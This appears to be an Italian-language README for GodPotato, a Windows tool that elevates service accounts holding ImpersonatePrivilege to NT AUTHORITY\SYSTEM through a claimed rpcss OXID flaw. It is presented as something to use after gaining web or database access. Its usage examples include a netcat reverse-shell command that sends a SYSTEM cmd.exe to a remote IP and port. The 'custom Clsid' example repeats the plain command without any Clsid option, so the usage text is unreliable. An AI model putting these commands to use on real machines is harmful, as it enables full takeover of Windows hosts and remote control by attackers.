
Strumento di escalation dei privilegi basato su DCOM per Windows Server 2012-2022 e Windows 8-11, che eleva gli utenti con ImpersonatePrivilege a NT AUTHORITY\SYSTEM tramite la vulnerabilità rpcss oxid.
Basandomi sulla storia dell'escalation dei privilegi Potato negli ultimi 6 anni, dall'inizio di RottenPotato fino alla fine di JuicyPotatoNG, ho scoperto una nuova tecnologia studiando DCOM, che consente l'escalation dei privilegi in Windows 2012 - Windows 2022, ora basta avere il permesso "ImpersonatePrivilege". Allora sei "NT AUTHORITY\SYSTEM", di solito i servizi WEB e i servizi di database hanno i permessi "ImpersonatePrivilege".
L'escalation dei privilegi Potato viene solitamente utilizzata quando otteniamo privilegi WEB/database. Possiamo elevare un utente di servizio con privilegi bassi a privilegi "NT AUTHORITY\SYSTEM". Tuttavia, lo storico Potato non ha modo di funzionare sugli ultimi sistemi Windows. Mentre studiavo DCOM, ho trovato un nuovo metodo che può eseguire l'escalation dei privilegi. Ci sono alcuni difetti in rpcss quando gestisce oxid, e rpcss è un servizio che deve essere aperto dal sistema, quindi può funzionare su quasi qualsiasi sistema operativo Windows, l'ho chiamato GodPotato.
Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
Argomenti:
-cmd Richiesto:True Riga di comando (default cmd /c whoami)
Esempio:
GodPotato -cmd "cmd /c whoami"
Usa il Clsid integrato del programma per l'escalation dei privilegi ed esegui un semplice comando
GodPotato -cmd "cmd /c whoami"

Personalizza Clsid ed esegui comandi
GodPotato -cmd "cmd /c whoami"

Esegui comandi di reverse shell
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
zcgonvh
skay